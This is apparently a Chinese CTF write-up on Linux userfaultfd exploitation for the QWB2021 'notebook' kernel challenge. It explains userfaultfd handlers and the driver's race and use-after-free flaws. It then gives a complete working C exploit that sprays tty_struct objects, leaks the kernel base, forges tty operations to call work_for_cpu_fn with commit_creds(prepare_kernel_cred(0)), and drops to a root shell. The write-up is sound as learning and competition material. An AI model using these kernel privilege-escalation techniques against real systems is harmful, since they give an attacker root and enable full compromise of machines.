Userfaultfd
2022-04-09 14:47:55

userfaultfd

介绍:

它是Linux提供的一种让用户自己处理缺页异常的机制

用户可以自定义函数来处理这类事件

缺页:访问的页面没有进入RAM中,例mmap创建的堆,它实际上是没有装载至内存中,系统有自己默认的机制处理,用户也可以自定义处理函数,在处理函数没有结束之前,缺页发生的位置将处于暂停状态

利用:

函数例:

copy_from_user(kptr,user_buf,size);

如果user_buf是一块mmap映射的,未初始化的区域==》触发页错误,copy_from_user将暂停执行==》

在暂停期间,开启另外一个进程,将ptr释放,再把其他结构申请至这里(例tty_struct等目标结构)==》

等待缺页处理结束,copy_from_user恢复执行==》此时ptr指向tty_struct结构==》

可以对tty_struct结构进行修改

注册userfaultfd:

void ErrExit(char* err_msg)
{
    puts(err_msg);
    exit(-1);
}

void RegisterUserfault(void *fault_page,void *handler)
{
    pthread_t thr;
    struct uffdio_api ua;
    struct uffdio_register ur;
    uint64_t uffd  = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    ua.api = UFFD_API;
    ua.features = 0;
    if (ioctl(uffd, UFFDIO_API, &ua) == -1)
        ErrExit("[-] ioctl-UFFDIO_API");

    ur.range.start = (unsigned long)fault_page; //我们要监视的区域
    ur.range.len   = PAGE_SIZE;
    ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) //注册缺页错误处理
        //当发生缺页时,程序会阻塞,此时,我们在另一个线程里操作
        ErrExit("[-] ioctl-UFFDIO_REGISTER");
    //开一个线程,接收错误的信号,然后处理
    int s = pthread_create(&thr, NULL,handler, (void*)uffd);
    if (s!=0)
        ErrExit("[-] pthread_create");
}

使用:

RegisterUserfault(mmap_buf,handler)

==》将handler函数绑定至mmap_buf,当mmap_buf出现缺页异常时调用handler来进行处理

handler模板:

void* userfaultfd_leak_handler(void* arg)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long) arg;
    struct pollfd pollfd;
    int nready;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);

定义了一个uffd_msg类型的结构体接收消息

需要一个pollfd类型的结构体:

fd设置为传入的arg

evebts设置为POLLIN

==》执行poll(&pollfd,1,-1)来进行轮询操作,直到出现缺页错误

==》处理缺页:

    sleep(3);//暂停线程
    if (nready != 1)
    {
        ErrExit("[-] Wrong poll return val");
    }
    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0)
    {
        ErrExit("[-] msg err");
    }

    char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
    {
        ErrExit("[-] mmap err");
    }
    struct uffdio_copy uc;
    // init page
    memset(page, 0, sizeof(page));
    uc.src = (unsigned long) page;
    uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);
    puts("[+] leak handler done");
    return NULL;
}

例题:

QWB2021-notebook

题目提供:

查看启动脚本:

#!/bin/sh
stty intr ^]
exec timeout 300 qemu-system-x86_64 -m 64M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap -monitor /dev/null 2>/dev/null -s

检查保护:

前置知识:

slab:Linux操作系统的一种内存分配机制

读写锁:

当写锁被取走时,所有取锁操作被阻塞

当读锁被取走时,取写锁的操作被阻塞

一种在完全控制了tty对象的情况下好用的trick,甚至不用rop:

https://zhuanlan.zhihu.com/p/385645268

一个内核函数:

编译后:

函数位于workqueue机制的实现中,只要是开启了多核支持的内核(CONFIG_SMP)都会包含这个函数。

只需要控制第一个参数指向的内存==》即可实现带一个任意参数调用的任意函数==》

并且可以将返回值存入第一个参数指向的内存,并且该gadget可以干净的返回==》

并且在执行过程中无需对SMEP,SMAP做任何操作==》

由于在内核中用了大量的read/write/ioctl,且实现的第一个参数也都恰好是对应的对象本身==》

实现提权==》commit_creds(prepare_kernel_cred(0))==》调用两次函数调用即可

若需要禁用SELinux之类的,找一个任意地址写0的gadget即可

静态分析:

==》

在noteedit和noteadd中取了读锁:

noteadd:

在更新size前调用了copy_from_user:

==》可以将线程卡死在这里,将size改为0x60

noteedit:

在函数中,使用了krealloc==》没有对newsize做限制

并且在还未更新note指针前调用了copy_from_user==》

可以通过userfaultfd卡死当前线程,取消note的更新

notegift:

可以通过notegift函数,直接泄漏内存地址==》绕过kaslr

思路总结:

1、可以申请任意大小的slab==》

add限制了size最大为0x60,但是可以通过edit功能krealloc出任意大小的slab

2、可以UAF出任意大小的slab(只能控制前0x60字节的数据)

利用思路:
一、

1、多次打开ptmx结构体,在打开的时候会在alloc_tty_struct函数中调用

tty = kzalloc(sizeof(*tty),GFP_KERNEL)

分配空间0x2e0,对应kmalloc-1024

2、系统会将tty struct中的struct tty_operations初始为全局内核变量ptm_unix98_ops==》

它可以从/proc/kallsyms中获取相应的地址/偏移

3、之后会将喷射后的tty struct通过close给free出去,调用noteedit调整note大小为0x2e0==》

申请多个0x2e0的note,就会将free出去的tty struct申请回来==》

输出((uint64_t *)note)[3]位置的值减去偏移即可泄漏kernel base

二、

1、若将user_buf设置为一个没有初始化的内存区域,并且不在userfault中起额外的headler做内存恢复==》

noteedit和noteadd将会一直卡在copy_from_user之前

2、krealloc又可以产生一个free操作==》可以通过userfault来制造一个任意大小的UAF

(被卡住的thread无法执行copy_from_user之后的更新notelist中相关地址的代码)

3、注册userfault,监控一块未初始化的内存,在add和edit的时候由于其只拿了读写锁中的读锁,不是互斥的写锁==》这两个函数可以实现并发==》

copy_from_user(name,user_buf,0x1000);

==》从用户态的user_buf操作

===》若将user_buf设置为mmap后未初始化的内存,触发userfault==》程序阻塞==》

将notelist填满0x2e0大小的chunk,开启9x10个edit线程,0x10个add线程,通过edit线程krealloc一个size很大的note

==》触发krealloc的kfree==》会将0x2e0的chunk进行free操作==》

此时线程被卡在copy_from_user,noteedit中的addr并没有被修改==》UAF

===》喷射大量tty_struct将free chunk中填成tty_struct

===》通过add线程修改notelist中的chunk size为正常大小以通过__check_object_size的检查

4、此时notelist上的一些note已经放置了tty_struct===》

通过read操作读取对应的notelist上的tty_struct中的成员变量===》泄漏kernel base

(ptm_unix98_ops或者pty_unix98_ops)

5、伪造一个fake_tty_ops放到notelist的其中项,在fake ops中,让iioctl函数指向work_for_cpu_fn:

__int64 __fastcall work_for_cpu_fn(_QWORD *a1)
{
  _QWORD *v1; // rbx
  __int64 (*v2)(void); // rax
  __int64 v3; // rdi
  __int64 result; // rax
 
  _fentry__(a1);
  v1 = a1;
  v2 = a1[4];                                   // a1+32
  v3 = a1[5];                                   // a1+40
  result = _x86_indirect_thunk_rax(v2);
  v1[6] = result;                               // a1+48
  return result;
}

==》调用了(a1+32),参数为*(a1+40),返回值放在(a1+48)==》

配合tty_struct==》a1指向了notelist上之前UAF的tty_struct,然后伪造这个tty_struct==》

在偏移为32处的值为想要调用的函数,40处的值为参数,返回值在48的位置==》

===》布置commit_creds(prepare_kernel_cred(0))

===》最后调用ioctl函数==》触发work_for_cpu_fn调用commit_creds(prepare_kernel_cred(0))

exp:

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <syscall.h>
#include <poll.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <assert.h>

#define PAGE_SIZE 0x1000
#define TTY_STRUCT_SZIE 0x2E0

size_t work_for_cpu_fn_off = 0xffffffff8949eb90 - 0xffffffff8a28e440;
size_t prepare_kernel_cred_off = 0xffffffffa14a9ef0 - 0xffffffffa228e440;
size_t commit_creds_off = 0xffffffffa14a9b40 - 0xffffffffa228e440;
size_t kernel_base;

struct userarg
{
    size_t idx;
    size_t size;
    void* buf;
};

int note_fd;
void* stuck_mapped_memory;

//注册userfaultfd
void ErrExit(char* err_msg)
{
    puts(err_msg);
    exit(-1);
}

void RegisterUserfault(void *fault_page, void* handler)
{
    pthread_t thr;
    struct uffdio_api ua;
    struct uffdio_register ur;
    uint64_t uffd  = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    ua.api = UFFD_API;
    ua.features    = 0;
    if (ioctl(uffd, UFFDIO_API, &ua) == -1)
        ErrExit("[-] ioctl-UFFDIO_API");

    ur.range.start = (unsigned long)fault_page; //我们要监视的区域
    ur.range.len   = PAGE_SIZE;
    ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) //注册缺页错误处理,当发生缺页时,程序会阻塞,此时,我们在另一个线程里操作
        ErrExit("[-] ioctl-UFFDIO_REGISTER");
    //开一个线程,接收错误的信号,然后处理
    int s = pthread_create(&thr, NULL,handler, (void*)uffd);
    if (s!=0)
        ErrExit("[-] pthread_create");
}

void noteadd(size_t idx, size_t size, void* buf)
{
    struct userarg notearg;
    notearg.idx = idx;
    notearg.size = size;
    notearg.buf = buf;
    ioctl(note_fd, 0x100, &notearg);
}

void notegift(void* buf)
{
    struct userarg notearg;
    notearg.idx = 0;
    notearg.size = 0;
    notearg.buf = buf;
    ioctl(note_fd, 0x64, &notearg);
}

void notedel(size_t idx)
{
    struct userarg notearg;
    notearg.idx = idx;
    notearg.size = 0;
    notearg.buf = NULL;
    ioctl(note_fd, 0x200, &notearg);
}

void noteedit(size_t idx, size_t size, void* buf)
{
    struct userarg notearg;
    notearg.idx = idx;
    notearg.size = size;
    notearg.buf = buf;
    ioctl(note_fd, 0x300, &notearg);
}
//打开设备
void OpenNote()
{
    note_fd = open("/dev/notebook", O_RDWR);
    if (note_fd < 0)
    {
        ErrExit("[-] err in open notebook device");
    }
}

void* userfaultfd_sleep3_handler(void* arg)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long) arg;
    puts("[+] sleep3 handler created");
    int nready;
    struct pollfd pollfd;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    //将当前文件指针挂到等待队列
    puts("[+] sleep3 handler unblocked");
    sleep(3);//暂停线程
    if (nready != 1)
    {
        ErrExit("[-] Wrong poll return val");
    }
    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0)
    {
        ErrExit("[-] msg err");
    }

    char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
    {
        ErrExit("[-] mmap err");
    }
    struct uffdio_copy uc;
    // init page
    memset(page, 0, sizeof(page));
    uc.src = (unsigned long) page;
    uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);
    puts("[+] sleep3 handler done");
    return NULL;
}

void* userfaultfd_stuck_handler(void* arg)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long) arg;
    puts("[+] stuck handler created");
    int nready;
    struct pollfd pollfd;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    puts("[+] stuck handler unblocked");
    pause();
    if (nready != 1)
    {
        ErrExit("[-] Wrong poll return val");
    }
    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0)
    {
        ErrExit("[-] msg err");
    }

    char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
    {
        ErrExit("[-] mmap err");
    }
    struct uffdio_copy uc;
    // init page
    memset(page, 0, sizeof(page));
    uc.src = (unsigned long) page;
    uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);
    puts("[+] stuck handler done");
    return NULL;
}

void* edit_thread(int idx)
{
    puts("[+] edit thread start!");
    noteedit(idx, 0, stuck_mapped_memory);
    puts("[+] edit thread end!"); // won't reach here
    return NULL;
}

void* add_thread(int idx)
{
    puts("[+] add thread start!");
    noteadd(idx, 0x60, stuck_mapped_memory);
    puts("[+] add thread end!"); // won't reach here
    return NULL;
}

char buf_a[0x500] = {"aaa"};
size_t buf_tty[0x100], buf_fake_table[0x500];

int main()
{
    int pid;
    int tty_fd;

    stuck_mapped_memory = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);

    OpenNote();

    noteadd(0, 0x60, buf_a);
    noteadd(1, 0x60, buf_a);
    noteedit(1, 0x500, buf_a);
    noteedit(0, TTY_STRUCT_SZIE, buf_a);
    write(note_fd, buf_a, 0);


    pthread_t thr_edit, thr_add;
    pthread_create(&thr_edit, NULL, edit_thread, 0);
    sleep(1);
    pthread_create(&thr_add, NULL, add_thread, 0);
    sleep(1);
    puts("ready to open ptmx");
    for (int i = 0; i < 20; i++)
    {
        tty_fd = open("/dev/ptmx", O_RDWR);
        if (tty_fd < 0)
        {
            ErrExit("[-] ptmx open failed!");
        }
        read(note_fd, buf_tty, 0);
        if (buf_tty[0] == 0x100005401)
        {
            printf("[+] tty_struct found! fd = %d\n", tty_fd);
            break; // tty_struct used our slab
        }
    }
    if (buf_tty[0] != 0x100005401)
    {
        ErrExit("[-] leak failed");
    }

    size_t ptm_unix98_ops_addr = buf_tty[3];
    if ((ptm_unix98_ops_addr & 0xFFF) == 0x320) ptm_unix98_ops_addr += 0x120;
    size_t work_for_cpu_fn_addr =  work_for_cpu_fn_off + ptm_unix98_ops_addr;
    size_t tty_struct_addr = buf_tty[10] - 0x50;
    size_t commit_creds_addr = commit_creds_off + ptm_unix98_ops_addr;
    size_t prepare_kernel_cred_addr = prepare_kernel_cred_off + ptm_unix98_ops_addr;
    kernel_base = prepare_kernel_cred_addr - 0xA9EF0;

    printf("[+] ptm_unix98_ops addr leaked, addr: 0x%lx\n", ptm_unix98_ops_addr);
    printf("[+] work_for_cpu_fn addr leaked, addr: 0x%lx\n", work_for_cpu_fn_addr);
    printf("[+] prepare_kernel_cred addr leaked, addr: 0x%lx\n", prepare_kernel_cred_addr);
    printf("[+] tty_struct addr leaked, addr: 0x%lx\n", tty_struct_addr);

    size_t buf_gift[0x100];
    notegift(buf_gift);
    size_t note_0_addr = buf_gift[0 * 2];
    size_t note_1_addr = buf_gift[1 * 2];
    assert(note_0_addr == tty_struct_addr);
    printf("[+] note_1 addr leaked, addr: 0x%lx\n", note_1_addr);

    buf_tty[0] = 0x100005401;
    buf_tty[3] = note_1_addr;
    buf_tty[4] = prepare_kernel_cred_addr;
    buf_tty[5] = 0;
    write(note_fd, buf_tty, 0); // write to tty_struct

    buf_fake_table[7] = work_for_cpu_fn_addr;
    buf_fake_table[10] = work_for_cpu_fn_addr;
    buf_fake_table[12] = work_for_cpu_fn_addr;
    write(note_fd, buf_fake_table, 1);

    // write(tty_fd, buf_a, 1);
    ioctl(tty_fd, 233, 233);

    read(note_fd, buf_tty, 0);
    printf("[+] prepare_kernel_cred finished, return 0x%lx\n", buf_tty[6]);

    buf_tty[0] = 0x100005401;
    buf_tty[3] = note_1_addr;
    buf_tty[4] = commit_creds_addr;
    buf_tty[5] = buf_tty[6];
    write(note_fd, buf_tty, 0);
    sleep(1);

    // write(tty_fd, buf_a, 1);
    ioctl(tty_fd, 233, 233);

    printf("now uid = %d\n", getuid());

    if (getuid() == 0)
    {
        puts("[+] root now!");
        system("/bin/sh");
    }
    else
    {
        exit(-1);
    }

    return 0;
}

执行效果: